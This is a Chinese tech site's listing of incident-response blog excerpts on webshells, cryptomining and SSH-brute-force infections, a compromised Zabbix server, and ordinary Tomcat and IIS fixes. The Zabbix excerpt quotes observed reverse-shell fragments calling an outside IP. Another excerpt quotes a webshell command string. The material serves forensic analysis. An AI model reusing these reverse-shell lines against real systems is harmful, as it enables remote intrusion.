当前位置:8090社团 >故障解决
  • java程序挂马

    故障解决 超过17 人围观 0条评论
    java程序挂马
    0x01 背景 本周是在目前公司的最后一周,周五就离职了,在这里待了2年半时间,说短也不短,职业生涯可能也没多少个2年半。出门和同事去撸串的路上收到的告警,急忙赶回来处理,很简单的一次应急,没什么技术含量,因为时间点特殊才想着记录一下,毕竟是最后一次应急...
  • Linux服务器挖矿病毒
    攻击者通过Redis未授权访问,写入定时任务,执行挖矿程序。 排查过程 检查进程发现SSH后门 [root@testserver tmp]# ps aux | grep 2345 | grep -v grep root 13587 0.0 0.0 66624 1144 ? Ss Mar22 0:00 /tmp/su -oPort=2345 [root@testserver tmp]# lsof -p 13587...
  • 03-26
    故障解决 超过15 人围观 0条评论
    zabbix服务器被入侵解决
    0x01 背景 2017.3.27中午运维反应怀疑zabbix所在服务器被入侵。 0x02 排查过程 ps查看进程,发现端口反弹行为 Bash反弹:/dev/tcp/107.151.149.242/82 0>&1 Python反弹:rssocks -s 107.151.149.242:1080 查看进程启动时间发现为Feb 27,启动账...
  • 03-26
    故障解决 超过12 人围观 0条评论
    0x01 排查过程 11:10看到主机监控告警,告警内容为 cd "/usr/local/web/cdksw/general-tomcat-6.0.18/webapps/background/background/upload/";ver;echo [S];pwd;echo [E] 看内容就是菜刀马执行,看目录发现是upload可以猜测是文件上传的问题。受影响的是...
  • 03-26
    故障解决 超过111 人围观 0条评论
    0x01 排查过程 异常进程发现: /usr/bin/.sshd [kworker95] 在开机启动中发现: /tmp下的异常文件 异常的网络连接 使用lsof的时候发现返回内容不正常,查看下lsof mtime为10:46,并且大小不正常,很明显命令被替换了。 看下/usr/bin/下 /use/sbin下 ...
  • 03-26
    故障解决 超过13 人围观 0条评论
    某日哥们的负责的服务器因为SSH弱口令被黑了(又是边界安全意识的问题),看到异常的进程信息如下: lsof看一下打开的文件,发现/dev/g下存在这些东西 然后习惯性的按照时间排序查看一下命令,因为root已经被拿了所以非常有可能已经修改了命令。然后看到...
  • 03-26
    故障解决 超过110 人围观 0条评论
    中毒现象: 内到外的流量大,打DDOS 入侵方式: 通过SSH暴力破解 病毒分析: 木马病毒在top里面表现为随机的10位字母的进程,看/proc里面的信息,则为ls,cd之类常见的命令。杀死该进程后,会再随机产生一个新的进程,删除这些木马文件后,会再重新生成新...
  • 02-22
    故障解决 超过16 人围观 0条评论
    Tomcat java.lang.OutOfMemoryError问题定位
    OOM(OutOfMemoryError) 问题归根结底三点原因: 本身资源不够 申请的内存太多 资源耗尽 解决思路,换成Java服务分析,三个原因也可以解读为:   有可能是内存分配确实过小,而正常业务使用了大量内存 某一个对象被频繁申请,却没有释...
  • 02-13
    故障解决 超过13 人围观 0条评论
    IIS无法启动w3svc的解决方法
    解决IIS无法启动w3svc,供大家参考,具体内容如下 1)、首先在CMD命令行中输入:fsutil resource setautoreset true c:\ 2)、然后在运行services.msc 3)、找到Windows Process Activation Service服务 启动该服务,启动类型:自动 4)、继续找到World Wi...